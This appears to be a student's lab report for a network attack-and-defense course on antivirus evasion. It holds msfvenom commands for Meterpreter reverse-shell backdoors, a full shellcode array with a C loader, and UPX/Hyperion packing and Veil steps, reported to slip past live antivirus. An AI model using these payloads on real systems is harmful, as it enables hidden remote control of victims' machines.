2019-2020-2 20175305张天钰《网络对抗技术》 Exp3 免杀原理与实践

Posted 2020-11-27 zhangtianyu

2019-2020-2 《网络对抗技术》 Exp3 免杀原理与实践

---

一 . 知识小结

免杀概念

• 一般是对恶意软件做处理，让它不被杀毒软件所检测。

基础问题回答

杀软是如何检测出恶意代码的？

• 基于特征码的检测
  一段特征码就是一段或多段数据，经过对许多恶意代码的分析，我们发现了该类恶意代码经常出现的一段或多段代码，而且是其他正常程序没有的，即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。
• 启发式恶意软件检测
  就是根据些片面特征去推断。通常是因为缺乏精确判定依据。（非精确）
• 基于行为的恶意软件检测
  为加入了行为监控的启发式。通过对恶意代码的观察研究，发现有一些行为是恶意代码共同的比较特殊的行为，杀软会监视程序的运行，如果发现了这些特殊行为，就会认为其是恶意软件。（非精确）

免杀是做什么？

• 一般是对恶意软件做处理，让它不被杀毒软件所检测

免杀的基本方法有哪些？

• 改变特征码
  只有EXE— 加壳（压缩壳 加密壳）
  有shellcode(像Meterpreter）—利用encode进行编码
  有源代码——用其他语言进行重写再编译
• 改变行为
  通讯方式
  尽量使用反弹式连接：meterpreter本身即主要使用反弹连接
  使用隧道技术：如dns2tcp、iodine可将流量封闭为DNS协议包
  加密通讯数据：如使用reverse-https进行转发
  操作模式
  基于内存操作：meterpreter是基于内存操作的操作的
  减少对系统的修改
  加入混淆作用的正常功能代码

开启杀软能绝对防止电脑中恶意代码吗？

• 不能。部分恶意代码能隐藏自己行为，计算机中无绝对

二 . 实验步骤

1. 正确使用msf编码器

在实验二中使用msf生成了后门程序，我们可以使用virtotal网站进行扫描

-e用编码器进行编码并进行扫描：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00‘ LHOST=192.168.10.128 LPORT=5305 -f exe > met-encoded.exe

VirusTotal网站的扫描结果如下：

-i 编码十次并进行扫描：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00‘ LHOST=192.168.10.128 LPORT=5305 -f exe > met-encoded10.exe

VirusTotal网站的扫描结果如下：

结论:多次编码无法对免杀起到作用

2.msfvenom生成如jar其他类型文件

2.1.生成jar文件

• 使用命令：

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=5305 jar> 20175305_java_backdoor.jar

• 扫描结果如下：

2.2. 生成php文件

• 使用命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=5305 x> 20175305_php_backdoor.php

• 扫描结果如下：

3.veil

• 用apt-get install veil-evasion命令安装veil
• 之后打开veil，输入y继续安装直至完成：

成功的话会出现下面这个界面:

list查看所有可用的payload
use [payload_number]选择某个payload使用
set [选项] [参数]修改options
generate开始生成文件
过程中给文件起名:

• 用virustotal检测结果如下:

4.使用C + shellcode编程

• 首先使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=5305 -f c用c语言生成一段shellcode：

创建一个文件，然后将unsigned char buf[]赋值到其中，代码如下：

unsigned char buf[] = 
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
"x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"
"x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54"
"x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8xe6x80"
"x68x02x00x14xc6x89xe6x50x50x50x50x40x50x40x50"
"x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
"x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67"
"x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff"
"xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00"
"x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56"
"x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58"
"x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5"
"x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85"
"x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1"
"xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

• 使用命令：i686-w64-mingw32-g++ 20175305-backdoor.c -o 20175305-backdoor.exe编译为可执行文件

用virustotal检测结果如下：

5.加壳工具

5.1.压缩壳UPX
使用upx 20175305_veil_backdoor.exe -o 20175305_veil_backdoor_upx.exe命令加密刚才生成的程序
用virustotal检测结果如下：

5.2.加密壳Hyperion
将上一个生成的文件拷贝至/usr/share/windows-binaries/hyperion，并进入该目录
输入命令wine hyperion.exe -v upxed_20175305.exe upxed_20175305_hyperion.exe
对生成的文件进行扫描
用virustotal检测结果如下：

6.使用其他课程未介绍的方法

采用Veil-Evasion的其他荷载生成后门方式
进入evasion，使用list查看可用的有效荷载：

• 选择第32个荷载，是Python下shellcode在DES
  下加密一种。
• 输入option,查看有效荷载的选项,如下:

我们对其进行基本的配置：

• 设置反弹IP以及端口号，设置生成文件的名字和格式，在msfconsole中输入指令、测试可用性
  用virustotal检测结果如下：

2.通过组合应用各种技术实现恶意代码免杀

参照同学使用Evasion模块免杀，这里通过C+shellcode和加壳的方式实现免杀。

3.用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

电脑版本：Windows 10，通过C+shellcode和加壳的方式实现免杀
杀毒软件：火绒

三 . 实验总结与体会

本次实验感觉是目前做过的比较难的实验了，了解有关杀软查杀的各种资料，网站，研究如何让实验后门程序躲过查杀，参照了同学的博客和资料，问了好多人，终于做出来了，成就感满满，但是有些疑惑这个实验实用性是什么，我们为了杀毒首先应该知道病毒如何隐藏免杀嘛。